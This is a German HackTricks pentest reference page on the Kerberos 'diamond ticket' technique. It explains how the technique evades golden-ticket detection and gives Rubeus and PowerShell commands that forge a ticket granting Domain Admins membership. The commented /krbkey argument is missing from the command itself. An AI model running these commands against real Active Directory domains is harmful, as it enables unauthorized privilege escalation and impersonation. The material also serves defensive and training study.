hacktricks/windows-hardening/active-directory-methodology/diamond-ticket.md
2024-02-10 15:36:32 +00:00

4.4 KiB

Diamanttiket

Lernen Sie das Hacken von AWS von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Diamanttiket

Wie ein goldenes Ticket ist ein Diamanttiket ein TGT, das verwendet werden kann, um auf jeden Dienst als beliebiger Benutzer zuzugreifen. Ein goldenes Ticket wird vollständig offline gefälscht, mit dem krbtgt-Hash dieser Domäne verschlüsselt und dann in eine Anmeldesitzung übergeben. Da Domänencontroller TGTs, die sie (oder es) legitim ausgestellt haben, nicht verfolgen, akzeptieren sie bereitwillig TGTs, die mit ihrem eigenen krbtgt-Hash verschlüsselt sind.

Es gibt zwei gängige Techniken, um die Verwendung von goldenen Tickets zu erkennen:

  • Suchen Sie nach TGS-REQs, die keine entsprechenden AS-REQs haben.
  • Suchen Sie nach TGTs mit unsinnigen Werten, wie z.B. der standardmäßigen 10-jährigen Lebensdauer von Mimikatz.

Ein Diamanttiket wird erstellt, indem die Felder eines legitimen TGTs, das von einem DC ausgestellt wurde, modifiziert werden. Dies wird erreicht, indem ein TGT angefordert, mit dem krbtgt-Hash der Domäne entschlüsselt, die gewünschten Felder des Tickets modifiziert und anschließend erneut verschlüsselt werden. Dadurch werden die beiden oben genannten Mängel eines goldenen Tickets überwunden, da:

  • TGS-REQs eine vorhergehende AS-REQ haben werden.
  • Das TGT wurde von einem DC ausgestellt, was bedeutet, dass es alle korrekten Details aus der Kerberos-Richtlinie der Domäne enthält. Obwohl diese in einem goldenen Ticket genau gefälscht werden können, ist es komplexer und fehleranfälliger.
# Get user RID
powershell Get-DomainUser -Identity <username> -Properties objectsid

.\Rubeus.exe diamond /tgtdeleg /ticketuser:<username> /ticketuserid:<RID of username> /groups:512

# /tgtdeleg uses the Kerberos GSS-API to obtain a useable TGT for the user without needing to know their password, NTLM/AES hash, or elevation on the host.
# /ticketuser is the username of the principal to impersonate.
# /ticketuserid is the domain RID of that principal.
# /groups are the desired group RIDs (512 being Domain Admins).
# /krbkey is the krbtgt AES256 hash.
Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen: